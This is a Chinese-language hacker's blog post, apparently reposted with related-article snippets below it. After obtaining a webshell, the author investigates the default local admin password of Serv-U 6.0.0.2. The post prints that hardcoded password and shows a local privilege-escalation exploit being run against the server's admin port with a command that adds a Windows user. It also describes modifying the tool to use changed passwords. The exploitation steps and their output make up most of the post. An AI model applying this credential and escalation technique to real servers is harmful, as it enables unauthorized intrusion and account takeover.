对Serv-U 6.0.0.2默认帐户及密码的一点理解

今天获得一个webshell.发现了serv-u目录.看了下ServUDaemon.ini

[GLOBAL]

Version=6.0.0.2

OpenFilesDownloadMode=Exclusive

PacketTimeOut=300

LocalSetupPassword=ah6A0ED50ADD0A516DA36992DB43F3AA39

6.0.0.2版的.曾经看到哪说6.0版的默认本地管理帐号和密码依旧是原来那个.可又好像听谁说过6版的密码已经改了..

呵.这里发现.多出了一行Localsetuppassword.有种不详的预感.难道原来的默认密码已经通过它来设置了?加了MD5,算算纯数字倒还是可以.机会渺茫..

试试能不能写入...显示权限不足(一切都在预料之内).OK试试默认帐户和密码吧.

上传了xiaolu的那个serv-u权限提升工具

netstat -an |find "43958"

TCP    127.0.0.1:43958        0.0.0.0:0              LISTENING

嗯,是这个口.

执行命令

D:\web\www\XXXX_com\serv-u.exe 43958 "net user xiaoqi amen. /add "

******************************************************

Serv-u <3.x Local Exploit by xiaolu

>221 Serv-U FTP Server v6.0 for WinSock ready...

>331 User name okay, need password.

******************************************************

#l@$ak#.lk;0@P

>530 Not logged in.

******************************************************

看到530,心凉了一下,这么说来默认密码被改了.

上群里想获得一下确认.Superhei给了个很好的思路.下载主程序用UEDIT查看密码.

serv-u 6.0版之前要修改默认密码也是同样的方法,而且密码长度要求同样要求是14位(用其他字符替换#l@$ak#.lk;0@P)..

打开ServUAdmin.exe查了下,发现密码依旧是#l@$ak#.lk;0@P(特地复制到记事本观察,防止0/O l/1等字符混淆).确实没有变.

那么,看来Serv-u已经不依靠它来验证了?

为了找出真像.下载了一个Serv-U 6.0.0.2版(未装汉化,未破解,防止低版本汉化及破解补丁)

之前就在想,为什么Serv-U不可以提供一个让管理员修改密码的地方了?多少个服务器OVER的责任在Serv-U上啊?

好!这次来了,刚打开serv-u admin,发现在"停止服务"下面多了一个"设置更改密码"的按钮.

再来看看ServUDaemon.ini,除了版本改变了以外,与原来并没有不同之处.

回到控制台点开"设置更改密码"要求输入旧密码,新密码,确认.旧密码?旧密码是什么?#l@$ak#.lk;0@P吗?

提示密码不正确..怪了.试了下空密码...正确..这可把我郁闷了.难道在Serv-U 6.0.0.2里LocalAdministrator的密码就是空???

把xiaolu的权限提升工具拿来改了下,把密码改成空.编译好重新传了上去.

执行命令

D:\web\www\XXXX_com\serv-u2.exe 43958 "net user xiaoqi amen. /add "

******************************************************

Serv-u <3.x Local Exploit by xiaolu

>221 Serv-U FTP Server v6.0 for WinSock ready...

>331 User name okay, need password.

******************************************************

>530 Not logged in.

******************************************************

依然是530.呵..真是在做梦啊我.不过这次失败并不能代表默认密码不为空(因为这台机器的配置文件中有LocalSetupPassword=)

好的.回过头,看了下我机器上的ServUDaemon.ini,果然多了一行Localsetuppassword=xxxxxxx,看来确是刚才配置密码的MD5了.把我机器上Serv-u的密码改成空的(竟然允许我空的)再用这个serv-u2.exe试了下.不行..530,脑中突然闪过,难道"空"就是#l@$ak#.lk;0@P

操起serv-u.exe,yeah!成功.

到这里我们要开始怀疑一个问题了,如果修改了密码,那么就需要进行二次验证了?一次是#l@$ak#.lk;0@P 一次是修改完的密码.

呵..兴冲冲地跟superhei说了句"二次验证",修改了下那个权限提升工具,把其中的密码改为我在Serv-U中设置的密码,连上了.证明了没有进行二次验证.

总结一下,在Serv-U 6.0.0.2版本中,初始密码依旧是#l@$ak#.lk;0@P 但可以很方便地在Serv-U admin控制台修改密码,修改完密码,配置保存在ServUDaemon.ini的LocalSetupPassword=中.

原来的#l@$ak#.lk;0@P依旧保存只有当密码为空时使用.

另:要修改本地管理端口.只需要在ServUDaemon.ini中的[global]里加上一行LocalSetupPortNo=端口号,既可

(0)

相关推荐

  • 对Serv-U 6.0.0.2默认帐户及密码的一点理解

    今天获得一个webshell.发现了serv-u目录.看了下ServUDaemon.ini [GLOBAL] Version=6.0.0.2 OpenFilesDownloadMode=Exclusive PacketTimeOut=300 LocalSetupPassword=ah6A0ED50ADD0A516DA36992DB43F3AA39 6.0.0.2版的.曾经看到哪说6.0版的默认本地管理帐号和密码依旧是原来那个.可又好像听谁说过6版的密码已经改了.. 呵.这里发现.多出了一行Loc

  • 127.0.0.1无法访问,没有权限: GetObject

    解决127.0.0.1无法访问和0x800A0046 没有权限: 'GetObject'的方案 先感谢 D8-笨阿猪 D8-忘优草 D8-狼芽 的帮忙调试 ============================================ 一般,当我们在本机调试ASP动态网页时,可输入 http://localhosthttp://本地计算机名http://127.0.0.1  在当输入http://127.0.0.1时,一般机器都需要输入用户名和密码进入,这里将分两种情况: 一种是刚新建

  • ip default-network和ip route 0.0.0.0 0.0.0.0默认路由的区别

    在自己的2501上研究这三种默认路由的区别. 指定默认路由(last resort gateway)的指令供有3种,可以分成两类:1.ip default-gateway当路由器上的ip routing无效时,使用它指定默认路由,用于RXBoot模式(no ip routing)下安装IOS等.或者关闭ip routing 让路由器当主机用,此时需要配置默认网关 2.ip default-network和ip route 0.0.0.0 0.0.0.0两者都用于ip routing有效的路由器上

  • Android7.0 MTK设置默认桌面

    本文实例为大家分享了Android7.0 MTK设置默认桌面的具体代码,供大家参考,具体内容如下 项目需求:客户安装自己公司的桌面apk,安装完成后自动设置为默认桌面且不弹出始终和仅一次的弹框 1.找到安装应用的文件 frameworks\base\services\core\java\com\android\server\pm\PackageManagerService.java try { PackageParser.Package newPackage = scanPackageTrace

  • Spring Boot 2.0 设置网站默认首页的实现代码

    Spring Boot设置默认首页,方法实验OK如下 附上Application启动代码 /** * @ClassName Application * @Description Spring-Boot website启动类 * @author kevin.tian * @Date 2018-03 * @version 1.0.0 */ @SpringBootApplication @PropertySource(value={ "file:${APP_HOME_CONF}/overpayment

  • SpringBoot2.0.3打印默认数据源为 HikariDataSource (null)问题

    目录 SpringBoot2.0.3打印默认数据源为 HikariDataSource (null) 打印结果 需要注意 springboot的HikariDataSource默认配置的默认值如下 SpringBoot2.0.3打印默认数据源为 HikariDataSource (null) 刚刚开始以为DataSource是空对象,后来打印了下面的语句,才知道DataSource不是空的,我砸,我就好奇为什么 打印出HikariDataSource (null) 这样的语句,真的坑. @Aut

  • MySQL 8.0.0开发里程碑版发布!

    MySQL 开发团队于 12 日宣布 MySQL 8.0.0 开发里程碑版本(DMR)发布! 可能有人会惊奇 MySQL 为何从 5.x 一下跳跃到了 8.0.事实上,MySQL 5.x 系列已经延续了很多年,从被 Oracle 收购之前就是 5.1,而收购之后一直维持在 5.x,比如 5.5,5.6,5.7 等等.其实,如果按照原本的发布节奏,可以把 5.6.x 当成 6.x,5.7.x 当成 7.x.所以,只是换了版本命名方式而已. 不过这次发布的 MySQL 8.0.0 开发版本还是有不少

  • php mysql localhost,127.0.0.1和ip区别

    一家之言: localhost与127.0.0.1的区别 localhost与127.0.0.1的区别是什么?相信有人会说是本地ip,曾有人说,用127.0.0.1比localhost好,可以减少一次解析.看来这个入门问题还有人不清楚,其实这两者是有区别的. no1: localhost也叫local ,正确的解释是:本地服务器127.0.0.1在windows等系统的正确解释是:本机地址(本机服务器) no2: localhot(local)是不经网卡传输!这点很重要,它不受网络防火墙和网卡相

  • Node.js v8.0.0正式发布!看看带来了哪些主要新特性

    前言 Node.js于5月30号在其官方博客上发布了Node.js v8.0.0.这一版本将成为当前的长期维护版本,从2017年10月开始到2019年12月31号.而Node.js v6.0.0将会在2018年4月进入维护模式,并于2019年4月结束. 最新发布的版本代号为Carbon,带来了很多重要的特性改进和一些全新的特性. 引入async_hooks模块 新引入实验性模块async_hooks(之前叫作async_wrap),它包含了一组用于诊断的API,开发人员可以用它监控Node.js

  • Angular5.0.0新特性

    文章来自官网部分翻译 https://blog.angular.io/version-5-0-0-of-angular-now-available-37e414935ced Angular5.0.0版本已经正式发布 总结一下v5.0.0带来的新变化都有哪些. 1.构建优化 5.0版本默认采用CLI构建和打包.构建优化器是包含在CLI里面的一个工具,通过对你的应用程序更加语义化的理解可以使得你的打包程序(bundle)更小. 构建优化器有两个主要工作. 第一,我们可以将应用程序的一部分标记为纯应用

随机推荐